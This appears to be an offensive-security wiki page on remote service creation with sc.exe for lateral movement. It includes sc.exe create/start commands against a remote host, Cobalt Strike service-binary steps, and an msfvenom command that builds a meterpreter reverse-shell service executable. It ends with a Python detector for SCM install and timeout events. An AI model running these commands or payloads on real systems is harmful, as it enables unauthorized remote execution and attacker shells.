
# Service Control (SC)

{% hint style="warning" %}
Administrator rights on the target machine are mandatory.
{% endhint %}

The Service Controller (`sc`) is particularly valuable to attackers: it lets them run a program on a remote host by creating and starting a service there over SMB.

```powershell
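# In Windows PowerShell, `sc` is an alias for Set-Content, so call sc.exe explicitly.
# The space after "binpath=" is required.
sc.exe \\host.domain create ExampleService binpath= "c:\windows\system32\calc.exe"
sc.exe \\host.domain start ExampleService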
```

The caveat is that the executable must be a service binary. A service binary "registers" with the Service Control Manager (SCM) when it starts; a program that does not register is terminated. If a non-service binary is used, the agent/beacon therefore comes back only for a moment before it is terminated.

Directly creating an executable that runs as a service is possible:

[**Cobalt Strike**](https://www.cobaltstrike.com)**:**

In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type.

![Windows executable as a service in Cobalt Strike](/files/FdTk7swlgqfskNSj6jCZ)

[**Metasploit**](https://www.metasploit.com)**:**

Using msfvenom, specify the exe-service format:

```bash
msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe
```
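On the detection side, the non-service-binary caveat above leaves a recognisable pair in the target's System log: the SCM records the install (event 7045) and, shortly after, a start timeout (7009/7000) for the same service. The Python below is an added example, not part of the original page; the sample events, the `BackupAgent` and `OldService` names and the five-minute window are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
WINDOW = timedelta(minutes=5)  # assumed correlation window; tune per environment
# Constructed sample of System-log events (provider: Service Control Manager).
# 7045 = service installed; 7009/7000 = service did not connect to the SCM in time.
SAMPLE = r"""<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><EventID>7045</EventID><TimeCreated SystemTime="2024-05-01T09:00:00.0000000Z"/><Computer>host.domain</Computer></System>
<EventData><Data Name="ServiceName">BackupAgent</Data><Data Name="ImagePath">C:\Program Files\Backup\agent.exe</Data></EventData></Event>
<Event><System><EventID>7045</EventID><TimeCreated SystemTime="2024-05-01T10:00:00.0000000Z"/><Computer>host.domain</Computer></System>
<EventData><Data Name="ServiceName">ExampleService</Data><Data Name="ImagePath">c:\windows\system32\calc.exe</Data></EventData></Event>
<Event><System><EventID>7009</EventID><TimeCreated SystemTime="2024-05-01T10:00:32.0000000Z"/><Computer>host.domain</Computer></System>
<EventData><Data Name="param1">30000</Data><Data Name="param2">ExampleService</Data></EventData></Event>
<Event><System><EventID>7000</EventID><TimeCreated SystemTime="2024-05-01T10:00:32.0000000Z"/><Computer>host.domain</Computer></System>
<EventData><Data Name="param1">ExampleService</Data><Data Name="param2">%%1053</Data></EventData></Event>
<Event><System><EventID>7009</EventID><TimeCreated SystemTime="2024-05-01T10:05:00.0000000Z"/><Computer>host.domain</Computer></System>
<EventData><Data Name="param1">30000</Data><Data Name="param2">OldService</Data></EventData></Event>
</Events>"""

def parse(xml_text):
    """Yield (event_id, time, computer, data) for every event in the export."""
    for ev in ET.fromstring(xml_text).iter(NS + "Event"):
        meta = ev.find(NS + "System")
        stamp = meta.find(NS + "TimeCreated").get("SystemTime")[:19]  # drop fractions
        data = {d.get("Name"): d.text or "" for d in ev.iter(NS + "Data")}
        yield (int(meta.findtext(NS + "EventID")),
               datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S"),
               meta.findtext(NS + "Computer"), data)

def short_lived_installs(xml_text, window=WINDOW):
    """Return services that hit a start timeout within `window` of being installed."""
    installs, hits = {}, []  # installs: (computer, service) -> (time, image path)
    for eid, ts, host, data in sorted(parse(xml_text), key=lambda e: e[1]):
        if eid == 7045:
            installs[(host, data["ServiceName"])] = (ts, data.get("ImagePath", ""))
        elif eid in (7000, 7009):
            # Service name position differs between 7000 and 7009: match any value.
            for name in data.values():
                seen = installs.get((host, name))
                if seen and ts - seen[0] <= window:
                    installs.pop((host, name))  # report each install once
                    hits.append({"host": host, "service": name, "image_path": seen[1],
                                 "seconds_to_failure": int((ts - seen[0]).total_seconds())})
    return hits

if __name__ == "__main__":
    for hit in short_lived_installs(SAMPLE):
        print(hit)
```

A real service binary registers with the SCM and produces no timeout, so 7045 events on their own still need review.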

